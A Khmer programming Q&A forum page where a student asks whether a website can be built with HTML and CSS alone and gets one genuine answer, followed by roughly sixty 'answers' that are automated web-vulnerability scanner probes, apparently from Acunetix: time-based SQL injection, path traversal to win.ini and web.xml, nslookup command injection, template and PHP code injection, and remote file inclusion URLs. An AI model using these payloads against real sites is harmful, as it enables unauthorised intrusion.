៣០
វិច្ឆិកា

Samanak_Student

សូម​ចម្រើន​ពរ អាត្មាមានចម្ងល់មួយចង់សួរ ! តើវេបសាយមួយគេអាច​សរសេរ​ត្រឹមតែ Html & Css បានអត់?

ចម្លើយ

Ouspheaktra Phal

ប្រាកដ​ណាស់ បាន100% ។ ប៉ុន្តែ html សម្រាប់​បញ្ចូល​អក្សរ រូប វីឌីអូ ឯcss​សម្រាប់​រចនា​ធ្វើ​ឲ្យ​អក្សរ រូប វីឌីអូ​ទាំង​នោះ​មាន​លក្ខណៈ​ស្រស់​ស្អាត​ជាង​មុន ដូចនេះ​បើ​គេហទំព័រ​នោះ​មាន​ត្រឹម​តែhtmlនិងcss គេហទំព័រ​នោះ​មាន​ត្រឹម​តែ​អត្ថបទ រូបភាព វីឌីអូ និង​ស្តាយ​បន្តិចបន្តួច​បណ្ណោះ ។ គេហទំព័រ​ជា​ច្រើន គឺ​មាន​លើស​ពីនេះ​ទៅ​ទៀត គឺមាន​រហូត​ដល់​ចលនា​អក្សរ ធ្វើ​ឲ្យ​វីឌីអូ​ដែល​បញ្ចូល​ដោយ​htmlមាន​លក្ខណៈ​ទំនើប ។ គេហទំព័រ​គួរ​មាន Javascript មួយ​ទៀត ដើម្បី​បង្កើត​អន្តរកម្ម ឬ​ចលនា​ផ្សេងៗ​ដូចជា sbbic.org ដែល​រូប​ភាព​មានចលនា ហើយ​ពេល​ដាក់mouseលើ​អក្សរ វា​ចេញ​ជា​បញ្ជី​ផ្សេងៗ ។ មិន​មែន​មាន​ត្រឹម​តែhtml css និងjavascript នោះ​ទេ មាន​ភាសា​ផ្សេងទៀត ដូចជា php mySQL jQuery python Ruby... ដែល​គេ​ប្រើ​នៅ​ក្នុង គេហទំព័រ​ផ្សេងៗ ដូច​គេហទំព័រ​សារ​ព័ត៌មាន​នានា Facebook Youtube Google codecademy (គេហទំព័រ​បង្រៀន​កូដ​ខាង​លើ) ... ។

សំណាង​ល្អ

នៅថ្ងៃ

lgexxhrs

'" () &%

នៅថ្ងៃ

lgexxhrs

//www.vulnweb.com

នៅថ្ងៃ

lgexxhrs

KqKedOsZ';select pg_sleep (6) ; —

នៅថ្ងៃ

lgexxhrs

WEB-INF\web.xml

នៅថ្ងៃ

lgexxhrs

(select convert (int,CHAR (65) ) )

នៅថ្ងៃ

lgexxhrs

/\www.vulnweb.com

នៅថ្ងៃ

lgexxhrs

acux3596��z1��z2a�bcxuca3596

នៅថ្ងៃ

lgexxhrs

1

នៅថ្ងៃ

១០

lgexxhrs

"+response.write (9101387*9055035) +"

នៅថ្ងៃ

១១

lgexxhrs

../../../../../../../../../../boot.ini

នៅថ្ងៃ

១២

lgexxhrs

$ {10000204+9999823}

នៅថ្ងៃ

១៣

lgexxhrs

../../../../../../../../../../windows/win.ini.jpg

នៅថ្ងៃ

១៤

lgexxhrs

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

នៅថ្ងៃ

១៥

lgexxhrs

12345'"\'\") ;|] * { <>�''💩

នៅថ្ងៃ

១៦

lgexxhrs

1&n948953=v993673

នៅថ្ងៃ

១៧

lgexxhrs

(select (0) from (select (sleep (3) ) ) v) /*'+ (select (0) from (select (sleep (3) ) ) v) +'"+ (select (0) from (select (sleep (3) ) ) v) +"*/

នៅថ្ងៃ

១៨

lgexxhrs

................windowswin.ini

នៅថ្ងៃ

១៩

lgexxhrs

http://testasp.vulnweb.com/t/fit.txt?.jpg

នៅថ្ងៃ

២០

lgexxhrs

testasp.vulnweb.com

នៅថ្ងៃ

២១

lgexxhrs

response.write (9101387*9055035)

នៅថ្ងៃ

២២

lgexxhrs

set|set&set

នៅថ្ងៃ

២៣

lgexxhrs

'+response.write (9101387*9055035) +'

នៅថ្ងៃ

២៤

lgexxhrs

$ (nslookup yK2aepR9)

នៅថ្ងៃ

២៥

lgexxhrs

../../../../../../../../../../windows/win.ini

នៅថ្ងៃ

២៦

lgexxhrs

&nslookup P8Od3gUs&'\"`0&nslookup P8Od3gUs&`'

នៅថ្ងៃ

២៧

lgexxhrs

1some_inexistent_file_with_long_name.jpg

នៅថ្ងៃ

២៨

lgexxhrs

������������������������������������������������windows��win.ini

នៅថ្ងៃ

២៩

lgexxhrs

if (now () =sysdate () ,sleep (3) ,0) /*'XOR (if (now () =sysdate () ,sleep (3) ,0) ) OR'"XOR (if (now () =sysdate () ,sleep (3) ,0) ) OR"*/

នៅថ្ងៃ

៣០

lgexxhrs

Http://testasp.vulnweb.com/t/fit.txt

នៅថ្ងៃ

៣១

lgexxhrs

! ( () &&! |*|*|

នៅថ្ងៃ

៣២

lgexxhrs

-1; waitfor delay '0:0:3' —

នៅថ្ងៃ

៣៣

lgexxhrs

;print (md5 (acunetix_wvs_security_test) ) ;

នៅថ្ងៃ

៣៤

lgexxhrs

http://testasp.vulnweb.com/t/xss.html?%00.jpg

នៅថ្ងៃ

៣៥

lgexxhrs

..\..\..\..\..\..\..\..\windows\win.ini

នៅថ្ងៃ

៣៦

lgexxhrs

^ (#$! @#$) ( () ) ) ******

នៅថ្ងៃ

៣៧

lgexxhrs

-1) ; waitfor delay '0:0:6' —

នៅថ្ងៃ

៣៨

lgexxhrs

';print (md5 (acunetix_wvs_security_test) ) ;$a='

នៅថ្ងៃ

៣៩

lgexxhrs

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

នៅថ្ងៃ

៤០

lgexxhrs

-1) ) ; waitfor delay '0:0:6' —

នៅថ្ងៃ

៤១

lgexxhrs

";print (md5 (acunetix_wvs_security_test) ) ;$a="

នៅថ្ងៃ

៤២

lgexxhrs

1 waitfor delay '0:0:6' —

នៅថ្ងៃ

៤៣

lgexxhrs

$ {@print (md5 (acunetix_wvs_security_test) ) }

នៅថ្ងៃ

៤៤

lgexxhrs

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

នៅថ្ងៃ

៤៥

lgexxhrs

http://hitCYRVUhdCyX.bxss.me/

នៅថ្ងៃ

៤៦

lgexxhrs

AZeAtacU'; waitfor delay '0:0:9' —

នៅថ្ងៃ

៤៧

lgexxhrs

$ {@print (md5 (acunetix_wvs_security_test) ) } \

នៅថ្ងៃ

៤៨

lgexxhrs

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

នៅថ្ងៃ

៤៩

lgexxhrs

eBKKmtQY') ; waitfor delay '0:0:9' —

នៅថ្ងៃ

៥០

lgexxhrs

) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) )

នៅថ្ងៃ

៥១

lgexxhrs

9S9f01vm') ) ; waitfor delay '0:0:9' —

នៅថ្ងៃ

៥២

lgexxhrs

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\

នៅថ្ងៃ

៥៣

lgexxhrs

/www.vulnweb.com

នៅថ្ងៃ

៥៤

lgexxhrs

-1;select pg_sleep (3) ; —

នៅថ្ងៃ

៥៥

lgexxhrs

-1) ;select pg_sleep (3) ; —

នៅថ្ងៃ

៥៦

lgexxhrs

WEB-INF/web.xml

នៅថ្ងៃ

៥៧

lgexxhrs

http://www.vulnweb.com

នៅថ្ងៃ

៥៨

lgexxhrs

1'" () &%

នៅថ្ងៃ

៥៩

lgexxhrs

-1) ) ;select pg_sleep (6) ; —

នៅថ្ងៃ

៦០

lgexxhrs

EkIwto8I') ;select pg_sleep (6) ; —

នៅថ្ងៃ

៦១

lgexxhrs

acu9586<s1﹥s2ʺs3ʹuca9586

នៅថ្ងៃ

៦២

lgexxhrs

ufrYDPGQ') ) ;select pg_sleep (9) ; —

នៅថ្ងៃ

៦៣

lgexxhrs

{ {9999248*10000421} }

នៅថ្ងៃ

ចម្លើយរបស់អ្នក

សូមឆ្លើយចម្លើយ​ជាខ្មែរទៅនឹង​សំណួរខាងលើ ។

ដើម្បីអាចឆ្លើយតបនឹងសំណួរនេះ សូមឡុកចូលទៅគណនីរបស់អ្នកជាមុនសិនដោយចុចត្រង់នេះ

ឆ្លើយតាម Facebook